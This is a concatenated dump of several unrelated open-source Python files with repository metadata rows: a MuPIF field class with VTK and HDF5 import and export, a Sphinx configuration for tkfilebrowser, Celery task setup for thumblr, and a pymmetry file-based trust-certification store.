:param int componentID: An identifier of a component: vertexID or cellID
:param tuple value: Value to be set for a given component, should have the same units as receiver
.. Note:: If a mesh has mapping attached (a mesh view) then we have to remember value locally and record change. The source field values are updated after commit() method is invoked.
"""
self.value[componentID] = value
def commit(self):
"""
Commits the recorded changes (via setValue method) to a primary field.
"""
def getObjectID(self):
"""
Returns field objectID.
:return: Object's ID
:rtype: int
"""
return self.objectID
def getUnits(self):
"""
:return: Returns units of the receiver
:rtype: Physics.PhysicalUnits
"""
return self.unit
def merge(self, field):
"""
Merges the receiver with given field together. Both fields should be on different parts of the domain (can also overlap), but should refer to same underlying discretization, otherwise unpredictable results can occur.
:param Field field: given field to merge with.
"""
# first merge meshes
mesh = copy.deepcopy(self.mesh)
mesh.merge(field.mesh)
log.debug(mesh)
# merge the field values
# some type checking first
if self.fieldType != field.fieldType:
raise TypeError("Field::merge: fieldType of receiver and parameter is different")
if self.fieldType == FieldType.FT_vertexBased:
values = [0]*mesh.getNumberOfVertices()
for v in range(self.mesh.getNumberOfVertices()):
values[mesh.vertexLabel2Number(self.mesh.getVertex(v).label)] = self.value[v]
for v in range(field.mesh.getNumberOfVertices()):
values[mesh.vertexLabel2Number(field.mesh.getVertex(v).label)] = field.value[v]
else:
values = [0]*mesh.getNumberOfCells()
for v in range(self.mesh.getNumberOfCells()):
values[mesh.cellLabel2Number(self.mesh.giveCell(v).label)] = self.value[v]
for v in range(field.mesh.getNumberOfCells()):
values[mesh.cellLabel2Number(field.mesh.giveCell(v).label)] = field.value[v]
self.mesh = mesh
self.value = values
def field2VTKData (self, name=None, lookupTable=None):
"""
Creates VTK representation of the receiver. Useful for visualization. Requires pyvtk module.
:param str name: human-readable name of the field
:param pyvtk.LookupTable lookupTable: color lookup table
:return: Instance of pyvtk
:rtype: pyvtk.VtkData
"""
import pyvtk
if name is None:
name = self.getFieldIDName()
if lookupTable and not isinstance(lookupTable, pyvtk.LookupTable):
log.info('ignoring lookupTable which is not a pyvtk.LookupTable instance.')
lookupTable = None
if lookupTable is None:
lookupTable=pyvtk.LookupTable([(0, .231, .298, 1.0), (.4, .865, .865, 1.0), (.8, .706, .016, 1.0)], name='coolwarm')
# Scalars use different name than 'coolwarm'. Then Paraview uses its own color mapping instead of taking
# 'coolwarm' from *.vtk file. This prevents setting Paraview's color mapping.
scalarsKw = dict(name=name, lookup_table='default')
else:
scalarsKw = dict(name=name, lookup_table=lookupTable.name)
# see http://cens.ioc.ee/cgi-bin/cvsweb/python/pyvtk/examples/example1.py?rev=1.3 for an example
vectorsKw = dict(name=name) # vectors don't have a lookup_table
if self.fieldType == FieldType.FT_vertexBased:
if self.getValueType() == ValueType.Scalar:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Vector:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Vectors(self.value, **vectorsKw), lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Tensor:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example')
else:
if self.getValueType() == ValueType.Scalar:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Vector:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Vectors(self.value, **vectorsKw),lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Tensor:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example')
def getMartixForTensor(self, values):
"""
Reshape values to a list with 3x3 arrays. Usable for VTK export.
:param list values: List containing tuples of 9 values, e.g. [(1,2,3,4,5,6,7,8,9), (1,2,3,4,5,6,7,8,9), ...]
:return: List containing 3x3 matrices for each tensor
:rtype: list
"""
tensor = []
for i in values:
tensor.append(numpy.reshape(i, (3, 3)))
return tensor
def dumpToLocalFile(self, fileName, protocol=pickle.HIGHEST_PROTOCOL):
"""
Dump Field to a file using a Pickle serialization module.
:param str fileName: File name
:param int protocol: Used protocol - 0=ASCII, 1=old binary, 2=new binary
"""
pickle.dump(self, open(fileName, 'wb'), protocol)
def field2Image2D(self, plane='xy', elevation=(-1.e-6, 1.e-6), numX=10, numY=20, interp='linear', fieldComponent=0, vertex=True, colorBar='horizontal', colorBarLegend='', barRange=(None, None), barFormatNum='%.3g', title='', xlabel='', ylabel='', fileName='', show=True, figsize=(8, 4), matPlotFig=None):
"""
Plots and/or saves 2D image using a matplotlib library. Works for structured and unstructured 2D/3D fields. 2D/3D fields need to define plane. This method gives only basic viewing options, for aesthetic and more elaborated output use e.g. VTK field export with
postprocessors such as ParaView or Mayavi. Idea from https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html#id1
:param str plane: what plane to extract from field, valid values are 'xy', 'xz', 'yz'
:param tuple elevation: range of third coordinate. For example, in plane='xy' is grabs z coordinates in the range
:param int numX: number of divisions on x graph axis
:param int numY: number of divisions on y graph axis
:param str interp: interpolation type when transferring to a grid. Valid values 'linear', 'nearest' or 'cubic'
:param int fieldComponent: component of the field
:param bool vertex: if vertices shoud be plot as points
:param str colorBar: color bar details. Valid values '' for no colorbar, 'vertical' or 'horizontal'
:param str colorBarLegend: Legend for color bar. If '', current field name and units are printed. None prints nothing.
:param tuple barRange: min and max bar range. If barRange=('NaN','NaN'), it is adjusted automatically
:param str barFormatNum: format of color bar numbers
:param str title: title
:param str xlabel: x axis label
:param str ylabel: y axis label
:param str fileName: if nonempty, a filename is written to the disk, usually png, pdf, ps, eps and svg are supported
:param bool show: if the plot should be showed
:param tuple figsize: size of canvas in inches. Affects only showing a figure. Image to a file adjust one side automatically.
:param obj matPlotFig: False means plot window remains in separate thread, True waits until a plot window becomes closed
:return: handle to matPlotFig
:rtype: matPlotFig
"""
try:
import numpy as np
import math
from scipy.interpolate import griddata
import matplotlib
matplotlib.use('TkAgg') # Qt4Agg gives an empty, black window
import matplotlib.pyplot as plt
except ImportError as e:
log.error('Skipping field2Image2D due to missing modules: %s' % e)
return None
# raise
if self.fieldType != FieldType.FT_vertexBased:
raise APIError.APIError('Only FieldType.FT_vertexBased is now supported')
mesh = self.getMesh()
numVertices = mesh.getNumberOfVertices()
indX = 0
indY = 0
elev = 0
if plane == 'xy':
indX = 0
indY = 1
elev = 2
elif plane == 'xz':
indX = 0
indY = 2
elev = 1
elif plane == 'yz':
indX = 1
indY = 2
elev = 0
# find eligible vertex points and values
vertexPoints = []
vertexValue = []
for i in range(0, numVertices):
coords = mesh.getVertex(i).getCoordinates()
# print(coords)
value = self.giveValue(i)[fieldComponent]
if elevation[1] > coords[elev] > elevation[0]:
vertexPoints.append((coords[indX], coords[indY]))
vertexValue.append(value)
if len(vertexPoints) == 0:
log.info('No valid vertex points found, putting zeros on domain 1 x 1')
for i in range(5):
vertexPoints.append((i % 2, i/4.))
vertexValue.append(0)
# for i in range (0, len(vertexPoints)):
# print (vertexPoints[i], vertexValue[i])
vertexPointsArr = np.array(vertexPoints)
vertexValueArr = np.array(vertexValue)
xMin = vertexPointsArr[:, 0].min()
xMax = vertexPointsArr[:, 0].max()
yMin = vertexPointsArr[:, 1].min()
yMax = vertexPointsArr[:, 1].max()
# print(xMin, xMax, yMin, yMax)
grid_x, grid_y = np.mgrid[xMin:xMax:complex(0, numX), yMin:yMax:complex(0, numY)]
grid_z1 = griddata(vertexPointsArr, vertexValueArr, (grid_x, grid_y), interp)
# print (grid_z1.T)
plt.ion() # ineractive mode
if matPlotFig is None:
matPlotFig = plt.figure(figsize=figsize)
# plt.xlim(xMin, xMax)
# plt.ylim(yMin, yMax)
plt.clf()
plt.axis((xMin, xMax, yMin, yMax))
image = plt.imshow(grid_z1.T, extent=(xMin, xMax, yMin, yMax), origin='lower', aspect='equal')
# plt.margins(tight=True)
# plt.tight_layout()
# plt.margins(x=-0.3, y=-0.3)
if colorBar:
cbar = plt.colorbar(orientation=colorBar, format=barFormatNum)
if colorBarLegend is not None:
if colorBarLegend == '':
colorBarLegend = self.getFieldIDName() + '_' + str(fieldComponent)
if self.unit is not None:
colorBarLegend = colorBarLegend + ' (' + self.unit.name() + ')'
cbar.set_label(colorBarLegend, rotation=0 if colorBar == 'horizontal' else 90)
if title:
plt.title(title)
if xlabel:
plt.xlabel(xlabel)
if ylabel:
plt.ylabel(ylabel)
if vertex == 1:
plt.scatter(vertexPointsArr[:, 0], vertexPointsArr[:, 1], marker='o', c='b', s=5, zorder=10)
# plt.axis('equal')
# plt.gca().set_aspect('equal', adjustable='box-forced')
if isinstance(barRange[0], float) or isinstance(barRange[0], int):
image.set_clim(vmin=barRange[0], vmax=barRange[1])
if fileName:
plt.savefig(fileName, bbox_inches='tight')
if show:
matPlotFig.canvas.draw()
# plt.ioff()
# plt.show(block=True)
return matPlotFig
def field2Image2DBlock(self):
"""
Block an open window from matPlotLib. Waits until closed.
"""
import matplotlib.pyplot as plt
plt.ioff()
plt.show(block=True)
def toHdf5(self, fileName, group='component1/part1'):
"""
Dump field to HDF5, in a simple format suitable for interoperability (TODO: document).
:param str fileName: HDF5 file
:param str group: HDF5 group the data will be saved under.
The HDF hierarchy is like this::
group
|
+--- mesh_01 {hash=25aa0aa04457}
| +--- [vertex_coords]
| +--- [cell_types]
| \--- [cell_vertices]
+--- mesh_02 {hash=17809e2b86ea}
| +--- [vertex_coords]
| +--- [cell_types]
| \--- [cell_vertices]
+--- ...
+--- field_01
| +--- -> mesh_01
| \--- [vertex_values]
+--- field_02
| +--- -> mesh_01
| \--- [vertex_values]
+--- field_03
| +--- -> mesh_02
| \--- [cell_values]
\--- ...
where ``plain`` names are HDF (sub)groups, ``[bracketed]`` names are datasets, ``{name=value}`` are HDF attributes, ``->`` prefix indicated HDF5 hardlink (transparent to the user); numerical suffixes (``_01``, ...) are auto-allocated. Mesh objects are hardlinked using HDF5 hardlinks if an identical mesh is already stored in the group, based on hexdigest of its full data.
.. note:: This method has not been tested yet. The format is subject to future changes.
"""
import h5py
hdf = h5py.File(fileName, 'a', libver='latest')
if group not in hdf:
gg = hdf.create_group(group)
else:
gg = hdf[group]
# raise IOError('Path "%s" is already used in "%s".'%(path,fileName))
def lowestUnused(trsf, predicate, start=1):
"""
Find the lowest unused index, where *predicate* is used to test for existence, and *trsf* transforms
integer (starting at *start* and incremented until unused value is found) to whatever predicate accepts
as argument. Lowest transformed value is returned.
"""
import itertools
for i in itertools.count(start=start):
t = trsf(i)
if not predicate(t):
return t
# save mesh (not saved if there already)
newgrp = lowestUnused(trsf=lambda i: 'mesh_%02d' % i, predicate=lambda t: t in gg)
mh5 = self.getMesh().asHdf5Object(parentgroup=gg, newgroup=newgrp)
if self.value:
fieldGrp = hdf.create_group(lowestUnused(trsf=lambda i, group=group: group+'/field_%02d' % i, predicate=lambda t: t in hdf))
fieldGrp['mesh'] = mh5
fieldGrp.attrs['fieldID'] = self.fieldID
fieldGrp.attrs['valueType'] = self.valueType
# string/bytes may not contain NULL when stored as string in HDF5
# see http://docs.h5py.org/en/2.3/strings.html
# that's why we cast to opaque type "void" and uncast using tostring before unpickling
fieldGrp.attrs['units'] = numpy.void(pickle.dumps(self.unit))
fieldGrp.attrs['time'] = numpy.void(pickle.dumps(self.time))
# fieldGrp.attrs['time']=self.time.getValue()
if self.fieldType == FieldType.FT_vertexBased:
val = numpy.empty(shape=(self.getMesh().getNumberOfVertices(), self.getRecordSize()), dtype=numpy.float)
for vert in range(self.getMesh().getNumberOfVertices()):
val[vert] = self.getVertexValue(vert).getValue()
fieldGrp['vertex_values'] = val
elif self.fieldType == FieldType.FT_cellBased:
# raise NotImplementedError("Saving cell-based fields to HDF5 is not yet implemented.")
val = numpy.empty(shape=(self.getMesh().getNumberOfCells(), self.getRecordSize()), dtype=numpy.float)
for cell in range(self.getMesh().getNumberOfCells()):
val[cell] = self.getCellValue(cell)
fieldGrp['cell_values'] = val
else:
raise RuntimeError("Unknown fieldType %d." % self.fieldType)
@staticmethod
def makeFromHdf5(fileName, group='component1/part1'):
"""
Restore Fields from HDF5 file.
:param str fileName: HDF5 file
:param str group: HDF5 group the data will be read from (IOError is raised if the group does not exist).
:return: list of new :obj:`Field` instances
:rtype: [Field,Field,...]
.. note:: This method has not been tested yet.
"""
import h5py
hdf = h5py.File(fileName, 'r', libver='latest')
grp = hdf[group]
# load mesh and field data from HDF5
meshObjs = [obj for name, obj in grp.items() if name.startswith('mesh_')]
fieldObjs = [obj for name, obj in grp.items() if name.startswith('field_')]
# construct all meshes as mupif objects
meshes = [Mesh.Mesh.makeFromHdf5Object(meshObj) for meshObj in meshObjs]
# construct all fields as mupif objects
ret = []
for f in fieldObjs:
if 'vertex_values' in f:
fieldType, values = FieldType.FT_vertexBased, f['vertex_values']
elif 'cell_values' in f:
fieldType, values = FieldType.FT_cellBased, f['cell_values']
else:
ValueError("HDF5/mupif format error: unable to determine field type.")
fieldID, valueType, units, time = FieldID(f.attrs['fieldID']), f.attrs['valueType'], f.attrs['units'].tostring(), f.attrs['time'].tostring()
if units == '':
units = None # special case, handled at saving time
else:
units = pickle.loads(units)
if time == '':
time = None # special case, handled at saving time
else:
time = pickle.loads(time)
meshIndex = meshObjs.index(f['mesh']) # find which mesh object this field refers to
ret.append(Field(mesh=meshes[meshIndex], fieldID=fieldID, units=units, time=time, valueType=valueType, values=values, fieldType=fieldType))
return ret
def toVTK2(self, fileName, format='ascii'):
"""
Save the instance as Unstructured Grid in VTK2 format (``.vtk``).
:param str fileName: where to save
:param str format: one of ``ascii`` or ``binary``
"""
self.field2VTKData().tofile(filename=fileName, format=format)
@staticmethod
def makeFromVTK2(fileName, unit, time=0, skip=['coolwarm']):
"""
Return fields stored in *fileName* in the VTK2 (``.vtk``) format.
:param str fileName: filename to load from
:param PhysicalUnit unit: physical unit of filed values
:param float time: time value for created fields (time is not saved in VTK2, thus cannot be recovered)
:param [string,] skip: file names to be skipped when reading the input file; the default value skips the default coolwarm colormap.
:returns: one field from VTK
:rtype: Field
"""
import pyvtk
from .dataID import FieldID
if not fileName.endswith('.vtk'):
log.warning('Field.makeFromVTK2: fileName should end with .vtk, you may get in trouble (proceeding).')
ret = []
try:
data = pyvtk.VtkData(fileName) # this is where reading the file happens (inside pyvtk)
except NotImplementedError:
log.info('pyvtk fails to open (binary?) file "%s", trying through vtk.vtkGenericDataReader.' % fileName)
return Field.makeFromVTK3(fileName, time=time, units=unit, forceVersion2=True)
ugr = data.structure
if not isinstance(ugr, pyvtk.UnstructuredGrid):
raise NotImplementedError(
"grid type %s is not handled by mupif (only UnstructuredGrid is)." % ugr.__class__.__name__)
mesh = Mesh.UnstructuredMesh.makeFromPyvtkUnstructuredGrid(ugr)
# get cell and point data
pd, cd = data.point_data.data, data.cell_data.data
for dd, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased):
for d in dd:
# will raise KeyError if fieldID with that name is not defined
if d.name in skip:
continue
fid = FieldID[d.name]
# determine the number of components using the expected number of values from the mesh
expectedNumVal = (mesh.getNumberOfVertices() if fieldType == FieldType.FT_vertexBased else mesh.getNumberOfCells())
nc = len(d.scalars)//expectedNumVal
valueType = ValueType.fromNumberOfComponents(nc)
values = [d.scalars[i*nc:i*nc+nc] for i in range(len(d.scalars))]
ret.append(Field(
mesh=mesh,
fieldID=fid,
units=unit, # not stored at all
time=time, # not stored either, set by caller
valueType=valueType,
values=values,
fieldType=fieldType
))
return ret
def toVTK3(self, fileName, **kw):
"""
Save the instance as Unstructured Grid in VTK3 format (``.vtu``). This is a simple proxy for calling :obj:`manyToVTK3` with the instance as the only field to be saved. If multiple fields with identical mesh are to be saved in VTK3, use :obj:`manyToVTK3` directly.
:param fileName: output file name
:param ``**kw``: passed to :obj:`manyToVTK3`
"""
return self.manyToVTK3([self], fileName, **kw)
@staticmethod
def manyToVTK3(fields, fileName, ascii=False, compress=True):
"""
Save all fields passed as argument into VTK3 Unstructured Grid file (``*.vtu``).
All *fields* must be defined on the same mesh object; exception will be raised if this is not the case.
:param list of Field fields:
:param fileName: output file name
:param bool ascii: write numbers are ASCII in the XML-based VTU file (rather than base64-encoded binary in XML)
:param bool compress: apply compression to the data
"""
import vtk
if not fields:
raise ValueError('At least one field must be passed.')
# check if all fields are defined on the same mesh
if len(set([f.mesh for f in fields])) != 1:
raise RuntimeError(
'Not all fields are sharing the same Mesh object (and could not be saved to a single .vtu file')
# convert mesh to VTK UnstructuredGrid
mesh = fields[0].getMesh()
vtkgrid = mesh.asVtkUnstructuredGrid()
# add fields as arrays
for f in fields:
arr = vtk.vtkDoubleArray()
arr.SetNumberOfComponents(f.getRecordSize())
arr.SetName(f.getFieldIDName())
assert f.getFieldType() in (FieldType.FT_vertexBased, FieldType.FT_cellBased) # other future types not handled
if f.getFieldType() == FieldType.FT_vertexBased:
nn = mesh.getNumberOfVertices()
else:
nn = mesh.getNumberOfCells()
arr.SetNumberOfValues(nn)
for i in range(nn):
arr.SetTuple(i, f.giveValue(i))
if f.getFieldType() == FieldType.FT_vertexBased:
vtkgrid.GetPointData().AddArray(arr)
else:
vtkgrid.GetCellData().AddArray(arr)
# write the unstructured grid to file
writer = vtk.vtkXMLUnstructuredGridWriter()
if compress:
writer.SetCompressor(vtk.vtkZLibDataCompressor())
if ascii:
writer.SetDataModeToAscii()
writer.SetFileName(fileName)
# change between VTK5 and VTK6
if vtk.vtkVersion().GetVTKMajorVersion() == 6:
writer.SetInputData(vtkgrid)
else:
writer.SetInputData(vtkgrid)
writer.Write()
# finito
@staticmethod
def makeFromVTK3(fileName, units, time=0, forceVersion2=False):
"""
Create fields from a VTK unstructured grid file (``.vtu``, format version 3, or ``.vtp`` with *forceVersion2*); the mesh is shared between fields.
``vtk.vtkXMLGenericDataObjectReader`` is used to open the file (unless *forceVersion2* is set), but it is checked that contained dataset is a ``vtk.vtkUnstructuredGrid`` and an error is raised if not.
.. note:: Units are not supported when loading from VTK, all fields will have ``None`` unit assigned.
:param str fileName: VTK (``*.vtu``) file
:param PhysicalUnit units: units of read values
:param float time: time value for created fields (time is not saved in VTK3, thus cannot be recovered)
:param bool forceVersion2: if ``True``, ``vtk.vtkGenericDataObjectReader`` (for VTK version 2) will be used to open the file, isntead of ``vtk.vtkXMLGenericDataObjectReader``; this also supposes *fileName* ends with ``.vtk`` (not checked, but may cause an error).
:return: list of new :obj:`Field` instances
:rtype: [Field,Field,...]
"""
import vtk
from .dataID import FieldID
# rr=vtk.vtkXMLUnstructuredGridReader()
if forceVersion2 or fileName.endswith('.vtk'):
rr = vtk.vtkGenericDataObjectReader()
else:
rr = vtk.vtkXMLGenericDataObjectReader()
rr.SetFileName(fileName)
rr.Update()
ugrid = rr.GetOutput()
if not isinstance(ugrid, vtk.vtkUnstructuredGrid):
raise RuntimeError("vtkDataObject read from '%s' must be a vtkUnstructuredGrid (not a %s)" % (
fileName, ugrid.__class__.__name__))
# import sys
# sys.stderr.write(str((ugrid,ugrid.__class__,vtk.vtkUnstructuredGrid)))
# make mesh -- implemented separately
mesh = Mesh.UnstructuredMesh.makeFromVtkUnstructuredGrid(ugrid)
# fields which will be returned
ret = []
# get cell and point data
cd, pd = ugrid.GetCellData(), ugrid.GetPointData()
for data, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased):
for idata in range(data.GetNumberOfArrays()):
aname, arr = pd.GetArrayName(idata), pd.GetArray(idata)
nt = arr.GetNumberOfTuples()
if nt == 0:
raise RuntimeError("Zero values in field '%s', unable to determine value type." % aname)
t0 = arr.GetTuple(0)
valueType = ValueType.fromNumberOfComponents(len(arr.GetTuple(0)))
# this will raise KeyError if fieldID with that name not defined
fid = FieldID[aname]
# get actual values as tuples
values = [arr.GetTuple(t) for t in range(nt)]
ret.append(Field(
mesh=mesh,
fieldID=fid,
units=units, # not stored at all
time=time, # not stored either, set by caller
valueType=valueType,
values=values,
fieldType=fieldType
))
return ret
def _sum(self, other, sign1, sign2):
"""
Should return a new instance. As deep copy is expensive,
this operation should be avoided. Better to modify the field values.
"""
raise TypeError('Not supported')
def inUnitsOf(self, *units):
"""
Should return a new instance. As deep copy is expensive,
this operation should be avoided. Better to use convertToUnits method
performing in place conversion.
"""
raise TypeError('Not supported')
# def __deepcopy__(self, memo):
# """ Deepcopy operatin modified not to include attributes starting with underscore.
# These are supposed to be the ones valid only to s specific copy of the receiver.
# An example of these attributes are _PyroURI (injected by Application),
# where _PyroURI contains the URI of specific object, the copy should receive
# its own URI
# """
# cls = self.__class__
# dpcpy = cls.__new__(cls)
#
# memo[id(self)] = dpcpy
# for attr in dir(self):
# if not attr.startswith('_'):
# value = getattr(self, attr)
# setattr(dpcpy, attr, copy.deepcopy(value, memo))
# return dpcpy
| lgpl-3.0 | 7,138,186,339,437,092,000 | 43.094008 | 381 | 0.597896 | false |
j4321/tkFileBrowser | docs/conf.py | 1 | 5256 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- Project information -----------------------------------------------------
project = 'tkfilebrowser'
copyright = '2018, Juliette Monsel'
author = 'Juliette Monsel'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '2.2.5'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'tango'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'tkfilebrowserdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'tkfilebrowser.tex', 'tkfilebrowser Documentation',
'Juliette Monsel', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation',
author, 'tkfilebrowser', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| gpl-3.0 | 8,686,003,906,744,522,000 | 29.034286 | 79 | 0.649543 | false |
unisport/thumblr | thumblr/tasks.py | 1 | 1681 |
from django.conf import settings
from celery import Celery, Task
from raven import Client
import usecases
client = Client(settings.SENTRY_DSN)
celery = Celery('tasks')
celery.conf.update(
AWS_ACCESS_KEY_ID=settings.AWS_ACCESS_KEY_ID,
AWS_SECRET_ACCESS_KEY=settings.AWS_SECRET_ACCESS_KEY,
CELERY_TASK_SERIALIZER='json',
CELERY_ACCEPT_CONTENT=['json'],
CELERY_RESULT_SERIALIZER='json',
BROKER_URL="sqs://%s:%s@" % (settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY),
CELERY_RESULT_BACKEND="redis",
CELERY_TIMEZONE='Europe/Copenhagen',
BROKER_TRANSPORT_OPTIONS={'region': 'eu-west-1',
'polling_interval': 0.3,
'visibility_timeout': 3600,
'queue_name_prefix': 'catalog_products_'},
)
class ImagesCallbackTask(Task):
"""
Generic subclass for Product Image Processing tasks
so in case of of failure, a notification is sent to Sentry.
"""
# def on_success(self, retval, task_id, args, kwargs):
# pass
def on_failure(self, exc, task_id, args, kwargs, einfo):
# client.captureMessage('Task "%s" has failed miserably.' % task_id)
client.capture('raven.events.Message', message='Task "%s" has failed miserably.' % task_id,
data={},
extra={'exc': exc,
'Task ID': task_id,
'Args': args,
'Kwargs': kwargs,
'einfo': einfo
}
)
usecases.add_image = celery.task(usecases.add_image) | mit | -463,160,966,042,746,240 | 33.326531 | 100 | 0.558001 | false |
guaka/trust-metrics | trustlet/pymmetry/file_certs.py | 1 | 9725 | #!/usr/bin/env python
""" file_certs.py: File-based Trust Metric Profiles (example code)
Copyright (C) 2001 Luke Kenneth Casson Leighton <[email protected]>
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
File-based Profiles on which certifications (also file-based) can
be stored and retrieved for evaluation by Trust Metrics.
...with NO LOCKING! ...yet.
unfortunately, type info of non-string profile names
is lost on the [very basic] file-format. so, whilst
the trust metric and net flow evaluation code couldn't
care less what the type of its nodes is, the file
storage does.
*shrug*. who wants to be a number, anyway.
WARNING: there is a lot of class-context overloading
in this demonstration code, particularly DictCertifications
and FileCertifications get reused rather inappropriately.
... but it will do, as a simple example. [i'll get round
to doing a SQL and an XML one, later, properly].
"""
from certs import DictCertifications, CertInfo
from profile import Profile
from string import join
from os import makedirs, path
# deal with having to store strings as text. *sigh*
def unsafe_str(s):
s = s.strip()
if s[0] != "'" and s[0] != '"':
# paranoia. don't want code from file evaluated!
# if someone edits a file and removes the first
# quote but not the second, TOUGH.
s = '"""'+s+'"""'
return eval(s)
# yes, we _do_ want the quotes.
# they get removed by unsafe_str, above, on retrieval.
def safe_str(s):
return repr(str(s))
class FileCertifications(DictCertifications):
""" Certification file of format:
certname1: user1=level1, user2=level2, ...
certname2: user1=level1, user2=level2, ...
"""
def set_filename(self, file):
self.f = file
try:
p, f = path.split(file)
makedirs(p)
except:
pass
def __read_dict(self):
self.info = {}
try:
f = open(self.f,"rw")
except:
return
for l in f.readlines():
l = l.strip()
if len(l) == 0:
continue
[ftype, certs] = l.split(":")
ftype = unsafe_str(ftype)
certs = certs.split(",")
for cert in certs:
[fname, flevel] = cert.split("=")
l = unsafe_str(flevel)
fn = unsafe_str(fname)
DictCertifications.add(self, ftype, fn, l)
f.close()
def __write_dict(self):
f = open(self.f,"w")
for key in DictCertifications.cert_keys(self):
l = safe_str(key)+": "
certs = []
dict = DictCertifications.certs_by_type(self, key)
for c in dict.keys():
certs.append(safe_str(c)+"="+safe_str(dict[c]))
l += join(certs, ", ") + "\n"
f.write(l)
f.close()
def cert_keys(self):
self.__read_dict()
return DictCertifications.cert_keys(self)
def certs_by_type(self, type):
self.__read_dict()
return DictCertifications.certs_by_type(self, type)
def cert_type_keys(self, type, name):
self.__read_dict()
return DictCertifications.certs_type_keys(self, type, name)
def add(self, type, name, level):
self.__read_dict()
DictCertifications.add(self, type, name, level)
self.__write_dict()
def remove(self, type, name):
self.__read_dict()
DictCertifications.remove(self, type, name, level)
self.__write_dict()
def cert_level(self, type, name):
self.__read_dict()
return DictCertifications.cert_level(self, type, name)
class FileProfile(Profile):
def __init__(self, name, CertClass):
Profile.__init__(self, name, CertClass)
